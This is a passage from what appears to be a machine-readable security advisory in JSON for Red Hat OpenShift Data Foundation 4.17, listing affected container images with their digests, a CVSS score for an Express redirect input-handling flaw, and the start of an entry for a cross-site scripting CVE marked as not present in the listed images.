"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
